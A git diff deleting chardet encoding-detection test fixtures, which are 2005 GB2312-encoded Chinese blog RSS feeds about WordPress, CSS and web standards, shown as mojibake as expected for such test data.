ֱק¿ֽֽרµִ׃ֵֶ£÷1¡¢ֱק¿ֽֽר¨D¨Dµָ‎´ת־ִ׳ײ¹ד¸זµד»קֱקֱ¿½»»»£¨½»ׂ׳£©ֿµֽ³£¬ַ¶װ´«ֽ³־ִ׳ײ½»»»ֱ´µְִ©ױ¹÷ֹֽ‎¼¶£¬ַׂ»ײײ׳מ¾­¼ֳ׃׀׀§µִֽרױ¾ֶֽ¹ד¹₪¾£¬¼׃ָכֱק¿ֽֽרִד¿ֹׂװ»סµֱֳקֱ¿£¬ׂ²¿ֹׂװ³צֱקֱ¿¡£2¡¢ֱק¿ֽֽר¡×¡×µָ‎´ת־ִ׳ײ¹ד¸זµד»קֱקֱ¿½»»»£¨½»ׂ׳£©ֿµֽ³µִ׳מ´ףֽ»ֶֶ¾ַֽ½«ֱ´½׃´׃־ןְםֹֿµֿײ£¬ׂ»¸ִׂװ... - 2005-12-30 17:37:30 - bookye.com - - - \ No newline at end of file diff --git a/chardet/tests/GB2312/jjgod.3322.org.xml b/chardet/tests/GB2312/jjgod.3322.org.xml deleted file mode 100644 index e8c1c54..0000000 --- a/chardet/tests/GB2312/jjgod.3322.org.xml +++ /dev/null @@ -1,175 +0,0 @@ - - - - - - - Web4C - http://jjgod.3322.org - Web standards for Chinese Web developers... - Tue, 27 Dec 2005 16:54:24 +0000 - http://wordpress.org/?v=2.0 - en - - Wordpress 2.0 - http://jjgod.3322.org/2005/12/28/wordpress-20/ - http://jjgod.3322.org/2005/12/28/wordpress-20/#comments - Tue, 27 Dec 2005 16:50:24 +0000 - jjgod - - Web4C - http://jjgod.3322.org/2005/12/28/wordpress-20/ - - °ׁ Web4C ¸׀ֲµ½ֱֻ½סּל release µִ WP 2.0¡£¸»»ײקּג־× Binary Moon µִ Regulus¡£ֿךֿ¸µִµקױ´עֻד·ֵµ½·ֵ¼ׂװ÷ףָ¥׳צ£¬²»¹‎£¬־ׂ»¹ַ²»ֿ°¹ WYSIWYG ±א¼­ֶק£¬µֳֿכ·¨׳׃»»»״װ­ְ´µִ Markdown Plugin¡£

    -]]>
    - http://jjgod.3322.org/2005/12/28/wordpress-20/feed/ -
    - - Browser WS Support - http://jjgod.3322.org/2005/12/18/browser-ws-support/ - http://jjgod.3322.org/2005/12/18/browser-ws-support/#comments - Sun, 18 Dec 2005 13:46:50 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/12/18/browser-ws-support/ - - Web browser standards support£¬ׂ»ֶ×½ֿ׀ֲ½ָֿ«ֳזµִה¯ְְֶק Web ±ך׳¼ײ§³ײַי¿צ±ם¡£

    -]]>
    - http://jjgod.3322.org/2005/12/18/browser-ws-support/feed/ -
    - - Top 12 CSS Articles of 2005 - http://jjgod.3322.org/2005/12/18/top-12-css-articles-of-2005/ - http://jjgod.3322.org/2005/12/18/top-12-css-articles-of-2005/#comments - Sun, 18 Dec 2005 13:41:48 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/12/18/top-12-css-articles-of-2005/ - - CSS Beauty µִ My Top 12 CSS Articles/Tricks of 2005£¬2005 ִך׳מֿ²°®µִ®ֶ×¹״׃ CSS µִ־ִױֲ¡£

    -]]>
    - http://jjgod.3322.org/2005/12/18/top-12-css-articles-of-2005/feed/ -
    - - The Elements of Web Typography Style - http://jjgod.3322.org/2005/12/10/the-elements-of-web-typography-style/ - http://jjgod.3322.org/2005/12/10/the-elements-of-web-typography-style/#comments - Fri, 09 Dec 2005 18:11:43 +0000 - jjgod - - Typography - Asides - http://jjgod.3322.org/2005/12/10/the-elements-of-web-typography-style/ - - Richard Rutter ױ‎װ½« Robert Bringhurst µִ¹״׃ֵֵ°זׁ§µִ¾­µה¶ֱ־ן The Elements of Typographic Style ¼׃ׂװ׀¸ִ£¬¹ײ®·÷ֿ Web ֵֵֹֿ°זµִ׀טׂס£

    -]]>
    - http://jjgod.3322.org/2005/12/10/the-elements-of-web-typography-style/feed/ -
    - - Canvas - http://jjgod.3322.org/2005/11/30/canvas/ - http://jjgod.3322.org/2005/11/30/canvas/#comments - Wed, 30 Nov 2005 06:50:24 +0000 - jjgod - - DOM | Scripting - Browsers - Asides - http://jjgod.3322.org/2005/11/30/canvas/ - - Canvas ױג¸צ׃׀ָ₪µִ¶«־ק£¬ֻז׳ֵ Firefox 1.5 µִ·¢²¼£¬ײױ׃¿ֹׂװַ׳׳װְ´³¢װׂ»ֱֲֻֿ¡£

    -]]>
    - http://jjgod.3322.org/2005/11/30/canvas/feed/ -
    - - Venkman - http://jjgod.3322.org/2005/11/22/venkman/ - http://jjgod.3322.org/2005/11/22/venkman/#comments - Tue, 22 Nov 2005 15:42:44 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/11/22/venkman/ - - Venkman, Firefox 1.5 µִ JavaScript µקװֶק¡£

    -]]>
    - http://jjgod.3322.org/2005/11/22/venkman/feed/ -
    - - I like your colors - http://jjgod.3322.org/2005/11/20/i-like-your-colors/ - http://jjgod.3322.org/2005/11/20/i-like-your-colors/#comments - Sun, 20 Nov 2005 05:17:52 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/11/20/i-like-your-colors/ - - I like your colors, ׃ְֳ´ׁ°ױׂײ¸¶¨ֽרׂ³ֹֿ׃ֳµ½µִׁױֹ«µִ¹₪¾, via xxd.

    -]]>
    - http://jjgod.3322.org/2005/11/20/i-like-your-colors/feed/ -
    - - WP 2.0 Beta 1 - http://jjgod.3322.org/2005/11/20/wp-20-beta-1/ - http://jjgod.3322.org/2005/11/20/wp-20-beta-1/#comments - Sun, 20 Nov 2005 05:15:57 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/11/20/wp-20-beta-1/ - - WordPress µֲִֿׂ»¸צ°ז±¾µִµׂ»¸צ Beta£¬via gslin¡£

    -]]>
    - http://jjgod.3322.org/2005/11/20/wp-20-beta-1/feed/ -
    - - Knuth on W3C validator - http://jjgod.3322.org/2005/11/19/knuth-on-w3c-validator/ - http://jjgod.3322.org/2005/11/19/knuth-on-w3c-validator/#comments - Sat, 19 Nov 2005 09:08:07 +0000 - jjgod - - Asides - http://jjgod.3322.org/2005/11/19/knuth-on-w3c-validator/ - - װ׃¼‏ֱ׀±םֹֿ·¢ֿײµִ׃׀ָ₪¶«־ק: Donald Knuth ֽ»ָ»·¢ֿײ׳װ¼÷µִֽרׂ³²»ִֽ¨¹‎ W3C Validator µִ׀£ׁיֱֻ…

    -]]>
    - http://jjgod.3322.org/2005/11/19/knuth-on-w3c-validator/feed/ -
    - - Dojo - http://jjgod.3322.org/2005/11/09/dojo/ - http://jjgod.3322.org/2005/11/09/dojo/#comments - Wed, 09 Nov 2005 14:14:30 +0000 - jjgod - - DOM | Scripting - Asides - http://jjgod.3322.org/2005/11/09/dojo/ - - Dojo Toolkit ַׂ»ּ׳·½±דִד¹¹½¨ JavaScript ׃¦׃ֳµִ¹₪¾¼¯¡£

    -]]>
    - http://jjgod.3322.org/2005/11/09/dojo/feed/ -
    -
    -
    diff --git a/chardet/tests/GB2312/kelet.512j.com.xml b/chardet/tests/GB2312/kelet.512j.com.xml deleted file mode 100644 index ad76110..0000000 --- a/chardet/tests/GB2312/kelet.512j.com.xml +++ /dev/null @@ -1,353 +0,0 @@ - - - - - Hanging Garden - http://www.plastiku.com - ׳װ¼÷¶װ׳װ¼÷ְןµִ±נָֻֻµ»°,׳װ¼÷װ׳װ¼÷ִ²¿ֲֳ׀׀.-----ׁמֱ¶ - http://kelet.512j.com/images/logo1.gif http://kelet.512j.com - Thu, 29 Dec 2005 15:45:38 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ¡¾ׂכ¡¿³£¼CSS÷ֽHTMLµִ´תֲכ־ּג(¶‏) - http://www.plastiku.com/index.php/183/ - http://www.plastiku.com/index.php/183/#comments - Tue, 13 Dec 2005 14:05:03 +0000 - Kelet - - CssStaffcsstranslationwebdesign - http://www.plastiku.com/index.php/183/ - ½׃ׂװַ°·­ׂכׂ»°כµִִֶַ×£¬²»¹‎ױג´־ָװ¾ַֹׂ»²¿·ײ¡£ֲֿ´־׃¦¸ֳ»בװ½׃װְק°ֻׁ·­ֽך°ֹ¡£·¢ֿײֲ¸פׂ»ִךײ®¾ֳ׳װ¼÷µְִם½גַ¿׃ׂװַ°ֱֻ£¬ֻשׂװֻ³±ד½«װ­ְ´ִַ²¿·ײ·­ׂכµִ׃׀²»µ±µִµ״·½¸ר¸׀ֱֲֻׂ»ֲֿ¡£

    -

    װ­־ִµ״ײ·:Common Code Problem with CSS and HTML

    -

    MIMEְא׀ֽ

    -

    MIMEַ¶א׃ֳֽ¾µִֽר¼׃¼‏ְ©³ה׀­ׂיµִֻץ׀´¡£¶װ׃ײמָחֽרֲח·‏־סֶק»עױה¯ְְֶק³ּ׀עְ´ֻµ£¬°´ױױMIMEְא׀ֽ½«ׂ³ֳזִָ·ײְאַׂ»ײײ±ך׳¼·½·¨£¬²¢ַׂױג׀©³ּ׀ע¶¼÷¬׃׀ׂ»¸צMIMEְא׀ֱֽ׀±םׂװ±ד׃װ¿ח׳צ²׳קֿµֽ³µִ»·¾³ֲֿ׃ֳֿאֽ¬µִ·½·¨´«הֽ¬ְא׀ֽ־ִ±¾ִָ¡£

    -

    µ±ִ³ׂ»·‏־סֶקײ׀µִׂ»¸צׂ³ֳז׀טׂ×¶ֱָ¡װ¶³ּCSS־ִ¼‏µִ±÷ע£¬¸ש¾MIMEְא׀ֽµִ¶¨ׂו£¨ֽ¨³£ַי¿צֲַֿ"text/css"£©£¬ױג¸צׁש½±ם־ִ¼‏´ר׃׀.cssµִ־ִ¼‏ְ©ױ¹ֳ¡£ָ»¶ר·‏־סֶק׃׀±ָ´»ב´ם־ףµִ½«.css־ִ¼‏µִMIMEְא׀ֵֽ׀¶ֿ־×"text/plain"»עױַ"text/html"¡£ׂע´ֻµ±ׂ»¸צ±ך׳¼±אׂכֲֿµִׂ³ֳז£¨ׂ²¾ַֽ²ֹ׃ֳֽךױ־ִµµֹשֳקµִׂ³ֳז£©µק׃ֳױג¸צCSS־ִ¼‏µִ±÷ע¾ֽ»ב±»ֵ׀±נ־ײ»ֿא·µִMIMEְא׀ֽ£¬´ֻ±»ש׃Geckoµִה¯ְְֶק¾ֽ»ב÷צֲװװ¶³ּׁש½±ם£¬׃כ־ֲֳַָֿֿׂכֿףײ׀ִַׁשְְֳצµִֽרׂ³ֿא·´£¬ֳַֻ»ב½«ׂ³ֳזױ¹ֿײ־×־ָ־÷־ׁש½¶¨ׂוµִׁש׳׃¡£

    -

    ½ג¾צױג¸צ־ּגµִׂ»ײײ·½·¨ֱַ×ֿµ·‏־סֶק¹ְםװ±½«.cssµִMIMEְא׀ֹֽטײֳ־×ױ‎ָ·µִ"text/css"¡£¶װ׃Apache·‏־סֶקְ´ֻµ£¬ֱםׂ»ײײ¿ֹ׀׀µִ·½·¨ַװִדµִױ¾µד¸שִ¿ֲ¼ֲֿµִ.htaccess־ִ¼‏ײ׀׀´½רױגׁשׂ»׀׀:

    -AddType text/css .css -

    ױגׁשׂ»ְ´.css־ִ¼‏¾ֽ»ב±»µ±׳ק"text/css"ְא׀ְֽ´±אׂכ¡£ָח¹ִדµִ·‏־סֶק¹ְםװ±ֿײֱִֶֻד׀¸ִ.htaccess־ִ¼‏£¬ֳִַ´ִד¾ֽ׀טׂ×ֱ×ֿµֻ(ֻ‎)ׂװָ¡µֳָ¨ֿ׀¸ִױגׂ»MIMEְא׀ֽ¡£

    - -

    XMLֹשֳק

    -

    ÷¶אָֻ°®װXHTMLׂ³ֳזµִ¶¥²¿ֹשֳקXML£¬ׂע־×ֳַֻ´םׂװ־×ױגׁשµִֹשֳקַ±״ׂ×µִ¡£µ¼ֹֿ£¬ײ»׃׀µ±ׂ³ֳזַXML׀־½»עױ·ַXHTML׀־½±²ֵ׀טׂ×ױג׀׀ֹשֳק¡£·סװעµִ»°ױג׀׀ֹשֳק»ב°ׁIE6ָ׃½רׂ»¸צ»לֲׂµִ±אׂכִ£½ײ׀£¬²¢ַׂ»ב׃ֹ¶װױגׂ»׀׀־×´¦ְםµִ²»לֿ₪¶ר´רְ´ׂ»ֿµֱ׀ֿׁײ״µִ÷ף¹¡£ֶהָֻֿ½רµִה¯ְְֶקװ¶±נױג׀׀ֹשֳק±¶¼ֳ»׃׀ְ§ִׁ£¬µ«ַIE6²»ִ´¦ְםױגׂ»ַי¿צ¡£ֻשׂװ³‎·ִַדױזµִַװ׀´ׂ»¸צXMLׂ³ֳז·סװעµִ»°»¹ַ°ִַׁ׀׀ֹשֳק׳¢ֽµפ°ֹ¡£¸¶א׃׀¹״±אׂכִ£½÷ֽXMLֹשֳקµִ׀ֵֿ¢ַכ²־ױױױגֶ×־ִױֲRendering Mode and Doctype Switching

    -

    י׀´ url( )÷ֽ@importֲ·¾¶

    -

    µ±װ־ִ¼‏ײ׀²ֹ׃ֳֿא¶װֿא¶װֲ·¾¶ְ´ׂ‎ָכׁש½±םֱ´½׃µ״ײ·µִ±÷ע£¬׃׀ֱ½¸צײ״µדײµµֳ־ֳַׂ׳¢ׂג¡£ׂ»¸צַֻשׂ×¶ֱָ¡µִ־ִ¼‏£¨ְ‎ָח±³¾°ֽ¼ֶ¬־ִ¼‏£©µִֿא¶װֲ·¾¶µִ¡°ֿא¶װ¡±ײ¸µִַֿא¶װ׃.CSS־ִ¼‏±¾ֹם£¬¶ר²»ַHTMLׂ³ֳז־ִ¼‏£¬³‎·ַCSS´תֲכַ°÷¬װHTMLׂ³ֳזײ׀£¨¶ר²»ַ׳ק־×µ¥¶ְµִ־ִ¼‏´זװµִ£©¡£Netscape 4װ´¦ְםױגׂ»־ּג±¾ֽ׃׀־ּג£¬²»¹‎ֽ¬±ֻׂ²ַ־¨ׂ»»ב׃׀־ּגµִה¯ְְֶק¡£

    -

    µ¶‏¸צַ¹״׃ֿא¶װ÷ֽ¾ר¶װֲ·¾¶װurl()µִ()ײ׀¸ֳָח÷־י׀´¡£¹׃ֳ³‎ֲֳֿזֻש¸ר³צµִ±ם´ן·½½ײ®ֽגµִָ־÷־ׂ»ײײ׀־½ְ´י׀´ֲ·¾¶¶¼׃׀¿ִֹµ¼ײֲ¸צ±נה¯ְְֶק£¨׃ֶָהַ±ָ½ְֿֿµִה¯ְְֶק£©־·¨ױ‎³£¶ֱָ¡¡¡CSS־ִ¼‏£»

    -<style type="text/css">
    -@import url(../stylesfolder/mainstyles.css); -background-image: url(../images/bg-image.jpg); -</style>
    -

    װֱ´½׃µ״ײ·ַ°÷ף¹׃ֳµ¥ׂ‎÷ֵµִ±ם´ן½»בµ¼ײֲMACֲֿµִIE5²»ִ׃¦׃ֳ׳ֵׂ»ׁש½¡£¶רַׂױגׁשµִ±ם´ן½װµק׃ֳ±³¾°ֽ¼ֶ¬ׂװ¼°cssײ׀ָ־÷־²ֹ׃ֳױגׂ»±ם´ן½ֻש¶ֱָ¡µִµ״ײ·¶¼²»ִױ‎³£¹₪׳ק¡£

    -

    ³‎·ִַדװֽ¼װְֿ½µִה¯ְְֶק»עױIE5/Macֲֿׂ‏²״CSSׁש½£¬·סװע־ֳַׂ½¨ׂיִת׳מ÷ֳ¹׃ֳ²»´רׂ‎÷ֵµִ±ם´ן½ׂװ±ֳג²»±״ׂ×µִ־ּג¡£ִת¿ֹׂװ²י¿´ֲֳֿזµֱִ½¸צׂ³ֳזׂװ»סָ¡׃׀¹״ױגׂ»־ּגµִ׀ֵֿ¢£»

    - -

    ֱ׀±םֱדײµ»¯

    -

    ֽ¨³£µ±´תֲכ¦½«ׂ»ֿµֱ׀ֱ´½׃ׂװֱ׀±םµִ׀־½ְ´±ם´ןµִ»°£¬ֳַֻ¾ֽ»ב׃צµ½¸קײײ¸קׁש¹״׃¿ױ°׳(spacing)µִ־ּג¡£װׂ»¸צה¯ְְֶקײ׀¿´ֶנְ´ֽך÷ֳµִׁש½װֱםׂ»¸צה¯ְְֶקײ׀¿ִֹ¾ֽ²»ִ¶װֶכֿװ¾¡£²¢ַָׂח¹ִדֽ‎ֽ¼¼«ֱ¦ָ¥µק½פ׀װײµׂװ´ןµ½¶װֶכ¿ִֹײ»»ב¹ׂ³ֳז±הµֳ¸¼׃װד¸ג¶רׁׂ¡£ױגµִָ·ֳָָֻ·¢·ט£¬µ«ַ׃׀׳ֵ÷ְֿםµִ½גֽ£¬µ±ָ»¸ײ״ׂ×µִַ־ֳַׂ׃׀¿ֹׂװ½ג¾צױגׂ»־ּגµִ·½·¨¡£

    -

    ־ּגµִ¸שװ´װ׃µ±²»ֽ¬µִה¯ְְֶק׃צµ½ֱ׀±ם±ך¼ַ£¬ֳַֻ׳װ¶¯»ב²ֹ׃ֳ²»ֽ¬µִcss´תֲכײµׂװ±£ײ₪װֶהֲֿ»ש±¾ֱ׀±םִױ‎³£ֿװ¾־×ִ¬ָֿׁש½¡£װׂ»ײײה¯ְְֶקֲֿ¹׃ֳ²¹°׳£¨padding£©¾ִֽµֿײֱ׀±םµִ¼ה¾א£¬µ«ַװֱםׂ»¸צה¯ְְֶקֲֿׂ×´ןµ½ױגׁשµִ׀§¹ײ»ִֽ¨¹‎ֹטײֳ±½ח£¨margin£©ְ´µֿײ¡£ ִד¿ֹׂװֿכֿףׂ»ֲָֿח¹־ֳַׂ²»ֲָֿײ×µְױג׀©²»ֽ¬µדµִ»°£¬ֳִַ´ױג׀©ה¯ְְֶק»ב¸ש¾־ֳַֻׂשֹטײֳµִ±הֱ¿ײµױ¹ֿײ³צְ´µִׂ³ֳז׀§¹»ב±הµֳװץֳ´ׁש¡£ֿװָ»׳מ÷ףֳָ־ֳַׂ¾«ֹס·ײֱׁ±÷׃׀¿ִֹµִ¡£

    -

    ׀ׂװֻµִַ£¬־ֳַׂ׃׀ׂ»¸צ¼עµ¥µִ·½·¨ְ´׳טײ¹ױגׁשµִ´םֲׂ·¢ֹת¡£ׂא¼´ײ»ׂ×¼עµ¥µֱִדײµ»¯ֻש׃׀ֱ׀±ם±¾ֹםׂװ¼°ֶהִ²¿װ×ֻ״µִ±½ח(margin)÷ֽ²¹°׳(padding)¾ֽ¿ֹׂװֱֻ¡£

    -ol, ul, li {margin: 0; padding: 0;} -

    ױגֳ´ֹטײֳׂװ÷ף£¬½׃ְֲֿ´־ֳַׂ¾ֽ¿ֹׂװװµק÷ֽ¸קײײפ׀װµִִ¬ָֿײµµִַי¿צֲֿ¼ּ׀ר¸³׃ט±½ח»עױ²¹°׳²»ֽ¬µִײµ¡£Ahhh£¬ִַׁש¾ֽ÷ֳ¶אֱֻ£¡

    ]]>
    - ½׃ׂװַ°·­ׂכׂ»°כµִִֶַ×£¬²»¹‎ױג´־ָװ¾ַֹׂ»²¿·ײ¡£ֲֿ´־׃¦¸ֳ»בװ½׃װְק°ֻׁ·­ֽך°ֹ¡£·¢ֿײֲ¸פׂ»ִךײ®¾ֳ׳װ¼÷µְִם½גַ¿׃ׂװַ°ֱֻ£¬ֻשׂװֻ³±ד½«װ­ְ´ִַ²¿·ײ·­ׂכµִ׃׀²»µ±µִµ״·½¸ר¸׀ֱֲֻׂ»ֲֿ¡£

    -

    װ­־ִµ״ײ·:Common Code Problem with CSS and HTML

    -

    MIMEְא׀ֽ

    -

    MIMEַ¶א׃ֳֽ¾µִֽר¼׃¼‏ְ©³ה׀­ׂיµִֻץ׀´¡£¶װ׃ײמָחֽרֲח·‏־סֶק»עױה¯ְְֶק³ּ׀עְ´ֻµ£¬°´ױױMIMEְא׀ֽ½«ׂ³ֳזִָ·ײְאַׂ»ײײ±ך׳¼·½·¨£¬²¢ַׂױג׀©³ּ׀ע¶¼÷¬׃׀ׂ»¸צMIMEְא׀ֱֽ׀±םׂװ±ד׃װ¿ח׳צ²׳קֿµֽ³µִ»·¾³ֲֿ׃ֳֿאֽ¬µִ·½·¨´«הֽ¬ְא׀ֽ־ִ±¾ִָ¡£

    -

    µ±ִ³ׂ»·‏־סֶקײ׀µִׂ»¸צׂ³ֳז׀טׂ×¶ֱָ¡װ¶³ּCSS־ִ¼‏µִ±÷ע£¬¸ש¾MIMEְא׀ֽµִ¶¨ׂו£¨ֽ¨³£ַי¿צֲַֿ"text/css"£©£¬ױג¸צׁש½±ם־ִ¼‏´ר׃׀.cssµִ־ִ¼‏ְ©ױ¹ֳ¡£ָ»¶ר·‏־סֶק׃׀±ָ´»ב´ם־ףµִ½«.css־ִ¼‏µִMIMEְא׀ֵֽ׀¶ֿ־×"text/plain"»עױַ"text/html"¡£ׂע´ֻµ±ׂ»¸צ±ך׳¼±אׂכֲֿµִׂ³ֳז£¨ׂ²¾ַֽ²ֹ׃ֳֽךױ־ִµµֹשֳקµִׂ³ֳז£©µק׃ֳױג¸צCSS־ִ¼‏µִ±÷ע¾ֽ»ב±»ֵ׀±נ־ײ»ֿא·µִMIMEְא׀ֽ£¬´ֻ±»ש׃Geckoµִה¯ְְֶק¾ֽ»ב÷צֲװװ¶³ּׁש½±ם£¬׃כ־ֲֳַָֿֿׂכֿףײ׀ִַׁשְְֳצµִֽרׂ³ֿא·´£¬ֳַֻ»ב½«ׂ³ֳזױ¹ֿײ־×־ָ־÷־ׁש½¶¨ׂוµִׁש׳׃¡£

    -

    ½ג¾צױג¸צ־ּגµִׂ»ײײ·½·¨ֱַ×ֿµ·‏־סֶק¹ְםװ±½«.cssµִMIMEְא׀ֹֽטײֳ־×ױ‎ָ·µִ"text/css"¡£¶װ׃Apache·‏־סֶקְ´ֻµ£¬ֱםׂ»ײײ¿ֹ׀׀µִ·½·¨ַװִדµִױ¾µד¸שִ¿ֲ¼ֲֿµִ.htaccess־ִ¼‏ײ׀׀´½רױגׁשׂ»׀׀:

    -AddType text/css .css -

    ױגׁשׂ»ְ´.css־ִ¼‏¾ֽ»ב±»µ±׳ק"text/css"ְא׀ְֽ´±אׂכ¡£ָח¹ִדµִ·‏־סֶק¹ְםװ±ֿײֱִֶֻד׀¸ִ.htaccess־ִ¼‏£¬ֳִַ´ִד¾ֽ׀טׂ×ֱ×ֿµֻ(ֻ‎)ׂװָ¡µֳָ¨ֿ׀¸ִױגׂ»MIMEְא׀ֽ¡£

    - -

    XMLֹשֳק

    -

    ÷¶אָֻ°®װXHTMLׂ³ֳזµִ¶¥²¿ֹשֳקXML£¬ׂע־×ֳַֻ´םׂװ־×ױגׁשµִֹשֳקַ±״ׂ×µִ¡£µ¼ֹֿ£¬ײ»׃׀µ±ׂ³ֳזַXML׀־½»עױ·ַXHTML׀־½±²ֵ׀טׂ×ױג׀׀ֹשֳק¡£·סװעµִ»°ױג׀׀ֹשֳק»ב°ׁIE6ָ׃½רׂ»¸צ»לֲׂµִ±אׂכִ£½ײ׀£¬²¢ַׂ»ב׃ֹ¶װױגׂ»׀׀־×´¦ְםµִ²»לֿ₪¶ר´רְ´ׂ»ֿµֱ׀ֿׁײ״µִ÷ף¹¡£ֶהָֻֿ½רµִה¯ְְֶקװ¶±נױג׀׀ֹשֳק±¶¼ֳ»׃׀ְ§ִׁ£¬µ«ַIE6²»ִ´¦ְםױגׂ»ַי¿צ¡£ֻשׂװ³‎·ִַדױזµִַװ׀´ׂ»¸צXMLׂ³ֳז·סװעµִ»°»¹ַ°ִַׁ׀׀ֹשֳק׳¢ֽµפ°ֹ¡£¸¶א׃׀¹״±אׂכִ£½÷ֽXMLֹשֳקµִ׀ֵֿ¢ַכ²־ױױױגֶ×־ִױֲRendering Mode and Doctype Switching

    -

    י׀´ url( )÷ֽ@importֲ·¾¶

    -

    µ±װ־ִ¼‏ײ׀²ֹ׃ֳֿא¶װֿא¶װֲ·¾¶ְ´ׂ‎ָכׁש½±םֱ´½׃µ״ײ·µִ±÷ע£¬׃׀ֱ½¸צײ״µדײµµֳ־ֳַׂ׳¢ׂג¡£ׂ»¸צַֻשׂ×¶ֱָ¡µִ־ִ¼‏£¨ְ‎ָח±³¾°ֽ¼ֶ¬־ִ¼‏£©µִֿא¶װֲ·¾¶µִ¡°ֿא¶װ¡±ײ¸µִַֿא¶װ׃.CSS־ִ¼‏±¾ֹם£¬¶ר²»ַHTMLׂ³ֳז־ִ¼‏£¬³‎·ַCSS´תֲכַ°÷¬װHTMLׂ³ֳזײ׀£¨¶ר²»ַ׳ק־×µ¥¶ְµִ־ִ¼‏´זװµִ£©¡£Netscape 4װ´¦ְםױגׂ»־ּג±¾ֽ׃׀־ּג£¬²»¹‎ֽ¬±ֻׂ²ַ־¨ׂ»»ב׃׀־ּגµִה¯ְְֶק¡£

    -

    µ¶‏¸צַ¹״׃ֿא¶װ÷ֽ¾ר¶װֲ·¾¶װurl()µִ()ײ׀¸ֳָח÷־י׀´¡£¹׃ֳ³‎ֲֳֿזֻש¸ר³צµִ±ם´ן·½½ײ®ֽגµִָ־÷־ׂ»ײײ׀־½ְ´י׀´ֲ·¾¶¶¼׃׀¿ִֹµ¼ײֲ¸צ±נה¯ְְֶק£¨׃ֶָהַ±ָ½ְֿֿµִה¯ְְֶק£©־·¨ױ‎³£¶ֱָ¡¡¡CSS־ִ¼‏£»

    -<style type="text/css">
    -@import url(../stylesfolder/mainstyles.css); -background-image: url(../images/bg-image.jpg); -</style>
    -

    װֱ´½׃µ״ײ·ַ°÷ף¹׃ֳµ¥ׂ‎÷ֵµִ±ם´ן½»בµ¼ײֲMACֲֿµִIE5²»ִ׃¦׃ֳ׳ֵׂ»ׁש½¡£¶רַׂױגׁשµִ±ם´ן½װµק׃ֳ±³¾°ֽ¼ֶ¬ׂװ¼°cssײ׀ָ־÷־²ֹ׃ֳױגׂ»±ם´ן½ֻש¶ֱָ¡µִµ״ײ·¶¼²»ִױ‎³£¹₪׳ק¡£

    -

    ³‎·ִַדװֽ¼װְֿ½µִה¯ְְֶק»עױIE5/Macֲֿׂ‏²״CSSׁש½£¬·סװע־ֳַׂ½¨ׂיִת׳מ÷ֳ¹׃ֳ²»´רׂ‎÷ֵµִ±ם´ן½ׂװ±ֳג²»±״ׂ×µִ־ּג¡£ִת¿ֹׂװ²י¿´ֲֳֿזµֱִ½¸צׂ³ֳזׂװ»סָ¡׃׀¹״ױגׂ»־ּגµִ׀ֵֿ¢£»

    - -

    ֱ׀±םֱדײµ»¯

    -

    ֽ¨³£µ±´תֲכ¦½«ׂ»ֿµֱ׀ֱ´½׃ׂװֱ׀±םµִ׀־½ְ´±ם´ןµִ»°£¬ֳַֻ¾ֽ»ב׃צµ½¸קײײ¸קׁש¹״׃¿ױ°׳(spacing)µִ־ּג¡£װׂ»¸צה¯ְְֶקײ׀¿´ֶנְ´ֽך÷ֳµִׁש½װֱםׂ»¸צה¯ְְֶקײ׀¿ִֹ¾ֽ²»ִ¶װֶכֿװ¾¡£²¢ַָׂח¹ִדֽ‎ֽ¼¼«ֱ¦ָ¥µק½פ׀װײµׂװ´ןµ½¶װֶכ¿ִֹײ»»ב¹ׂ³ֳז±הµֳ¸¼׃װד¸ג¶רׁׂ¡£ױגµִָ·ֳָָֻ·¢·ט£¬µ«ַ׃׀׳ֵ÷ְֿםµִ½גֽ£¬µ±ָ»¸ײ״ׂ×µִַ־ֳַׂ׃׀¿ֹׂװ½ג¾צױגׂ»־ּגµִ·½·¨¡£

    -

    ־ּגµִ¸שװ´װ׃µ±²»ֽ¬µִה¯ְְֶק׃צµ½ֱ׀±ם±ך¼ַ£¬ֳַֻ׳װ¶¯»ב²ֹ׃ֳ²»ֽ¬µִcss´תֲכײµׂװ±£ײ₪װֶהֲֿ»ש±¾ֱ׀±םִױ‎³£ֿװ¾־×ִ¬ָֿׁש½¡£װׂ»ײײה¯ְְֶקֲֿ¹׃ֳ²¹°׳£¨padding£©¾ִֽµֿײֱ׀±םµִ¼ה¾א£¬µ«ַװֱםׂ»¸צה¯ְְֶקֲֿׂ×´ןµ½ױגׁשµִ׀§¹ײ»ִֽ¨¹‎ֹטײֳ±½ח£¨margin£©ְ´µֿײ¡£ ִד¿ֹׂװֿכֿףׂ»ֲָֿח¹־ֳַׂ²»ֲָֿײ×µְױג׀©²»ֽ¬µדµִ»°£¬ֳִַ´ױג׀©ה¯ְְֶק»ב¸ש¾־ֳַֻׂשֹטײֳµִ±הֱ¿ײµױ¹ֿײ³צְ´µִׂ³ֳז׀§¹»ב±הµֳװץֳ´ׁש¡£ֿװָ»׳מ÷ףֳָ־ֳַׂ¾«ֹס·ײֱׁ±÷׃׀¿ִֹµִ¡£

    -

    ׀ׂװֻµִַ£¬־ֳַׂ׃׀ׂ»¸צ¼עµ¥µִ·½·¨ְ´׳טײ¹ױגׁשµִ´םֲׂ·¢ֹת¡£ׂא¼´ײ»ׂ×¼עµ¥µֱִדײµ»¯ֻש׃׀ֱ׀±ם±¾ֹםׂװ¼°ֶהִ²¿װ×ֻ״µִ±½ח(margin)÷ֽ²¹°׳(padding)¾ֽ¿ֹׂװֱֻ¡£

    -ol, ul, li {margin: 0; padding: 0;} -

    ױגֳ´ֹטײֳׂװ÷ף£¬½׃ְֲֿ´־ֳַׂ¾ֽ¿ֹׂװװµק÷ֽ¸קײײפ׀װµִִ¬ָֿײµµִַי¿צֲֿ¼ּ׀ר¸³׃ט±½ח»עױ²¹°׳²»ֽ¬µִײµ¡£Ahhh£¬ִַׁש¾ֽ÷ֳ¶אֱֻ£¡

    ]]>
    - http://www.plastiku.com/index.php/183/feed/ -
    - - ֻ«׳׃ֻש÷ֳSilversunPickups - http://www.plastiku.com/index.php/182/ - http://www.plastiku.com/index.php/182/#comments - Mon, 12 Dec 2005 15:04:11 +0000 - Kelet - - ׂפְײ³ז׳׃/music - BlogStaffmusicsilversunpickups - http://www.plastiku.com/index.php/182/ - ֻ‎µִ׀ְִןׂ»¸צֹשׂפװ÷°½׀׳ֵ£÷ַכװpowerׂ»׀©¡£ -

